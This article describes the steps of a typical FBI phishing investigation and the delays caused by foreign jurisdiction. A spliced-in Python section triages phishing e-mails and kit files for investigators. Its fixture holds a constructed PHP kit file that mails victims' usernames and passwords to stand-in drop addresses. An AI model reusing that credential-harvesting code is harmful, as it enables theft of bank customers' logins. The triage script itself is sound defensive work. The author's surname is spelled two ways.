By John Jaser
Do you wonder what law enforcement is doing about phishing? Certainly they’re investigating these attacks. Occasionally we hear about fines and convictions for crimes that occurred years earlier. Meanwhile, the attacks and losses from phishing keep rising – to $100 million per year.
To learn about our law enforcement efforts, I called Special Agent Martin McBride, who investigates computer crime for the FBI. Mr. McBride took me through the typical steps of a phishing investigation, and it was eye-opening, to say the least. Here is the chronology of a typical FBI phishing investigation:
Someone alerts the Bureau that a phishing attack is under way. The FBI requests the phishing e-mail from the person who made the complaint, then examines the e-mail to determine where a respondent would go. This will be a fraudulent version of the bank’s Web site.
Accessing the Files
Next, the FBI asks the Web host for the files that make up the fraudulent site. Most Web hosts are helpful, though unaware that the fraudulent site is on their servers. The agent then scours the files to determine the e-mail address to which phished information will be sent. The agent then requests a subpoena to examine the access logs for that address. Time elapsed – about one to three days.
Mr. McBride reports that getting a subpoena can take a few hours to a few days. With subpoena in hand, the agent asks the e-mail host for the connection logs, which can reveal who is accessing the phishing e-mail accounts. More often than not, the addresses used by the phisher mask the real address, which means more subpoenas and more time. Time elapsed between request and receipt of the logs is seven to 10 days. At least two weeks have now elapsed since the initial complaint.
After taking time to analyze the data gathered to this point, the FBI can prepare a search warrant to examine the actual content of the phisher’s e-mail account. Reviewing the content of the accounts is where the success of a phishing scheme is most evident. Some accounts have been found to contain more than 15,000 credit cards. Search warrants in the United States can take, on average, one week to write and another week to obtain and execute.
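The first two investigative steps above (reading the e-mail to see where a victim would be sent, then scouring the site’s files for the address that receives the phished data) can be triaged with a small script. This is an added example, not the FBI’s or the article’s own tooling; the e-mail body and kit files below are constructed samples using reserved documentation addresses.

```python
import re
from html.parser import HTMLParser

# Constructed sample of a phishing e-mail body (not a real message).
PHISH_EMAIL = """<html><body>
<p>Your account is locked. <a href="https://secure-login.example-bank.test/verify">Click here</a></p>
<p>Or visit <a href="http://198.51.100.7/~kit/index.php">this page</a>.</p>
</body></html>"""

# Constructed files of a phishing kit, as a Web host might hand them over.
KIT_FILES = {
    "index.php": '<form action="login.php" method="post">...</form>',
    "login.php": ('<?php\n$to = "dropbox1@example.test";\n'
                  '$msg = $_POST["user"]."|".$_POST["pass"];\n'
                  'mail($to, "rez", $msg);\n'
                  'mail("backup.drop@example.test", "rez", $msg);\n'
                  'header("Location: https://www.example-bank.test/");\n?>'),
    "style.css": "body { color: #000; }",
}

class _HrefCollector(HTMLParser):
    """Collect href targets of <a> tags, in document order."""
    def __init__(self):
        super().__init__()
        self.hrefs = []
    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self.hrefs.extend(v for k, v in attrs if k == "href" and v)

def landing_urls(email_html):
    """Return the URLs a recipient would be taken to, deduplicated, in order."""
    p = _HrefCollector()
    p.feed(email_html)
    return list(dict.fromkeys(p.hrefs))

EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")

def exfil_addresses(files):
    """Map each kit file that calls mail() to the recipient addresses it uses."""
    result = {}
    for name, body in files.items():
        if "mail(" not in body:
            continue
        addrs = set()
        # Literal recipients: mail("someone@...", ...)
        for m in re.finditer(r'mail\(\s*"([^"]+)"', body):
            addrs.update(EMAIL_RE.findall(m.group(1)))
        # Recipients held in a variable: $to = "..."; mail($to, ...)
        for var in re.findall(r'mail\(\s*\$(\w+)', body):
            for m in re.finditer(r'\$' + var + r'\s*=\s*"([^"]+)"', body):
                addrs.update(EMAIL_RE.findall(m.group(1)))
        if addrs:
            result[name] = sorted(addrs)
    return result
```

The addresses returned are what the agent would name in the subpoena for connection logs; the landing URLs identify the host to ask for the kit files.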
While most phishing sites seem to be hosted inside the United States, most of the phishers themselves seem to be located outside of the country, says McBride. This is a major impediment to FBI investigations, since the FBI has no jurisdiction outside the country.
To overcome this restriction, the investigating agency can request assistance from another country under a Mutual Legal Assistance Treaty (MLAT). This process can consume as little as a few months, but more likely takes a year or longer. “The longer the process takes, the less likely it is that a phisher will be caught,” says McBride.
The irony is that MLATs were designed by the U.S. Department of State to improve the effectiveness of cross-border judicial assistance. An MLAT can grant an FBI agent the power to summon witnesses, compel the production of evidence and issue search warrants in another country.
“In reality,” says McBride, “an MLAT is only as good as the relationship between local enforcement officers in the U.S. and [those] in the foreign country.”
McBride says that most European countries are helpful, while many countries in Eastern Europe and Asia are not. “Unfortunately, most computer crimes seem to originate in Eastern Europe and Asia,” he said.
A Year and Counting
One of the FBI’s more successful phishing investigations is nearing the end of its second year and chances are that convicting the known phishing perpetrators will prevent very little phishing. The Russian mafia and others run so many chat rooms to buy and sell stolen debit and credit cards that law enforcement can’t possibly cover them all. “We can only go after the big fish,” says McBride.
Better response time and less time-consuming procedures would certainly improve the situation. But more importantly, banks need to further improve debit and credit card security to prevent our unwitting customers from surrendering enough of their personal information for a phisher to create a “full” card ready for fraud.
The phishers won’t play when the game doesn’t pay.
John Jazer is Internet security manager at Avon-based COCC Inc. (www.cocc.com), a 39-year-old firm specializing in outsourced information technology and support.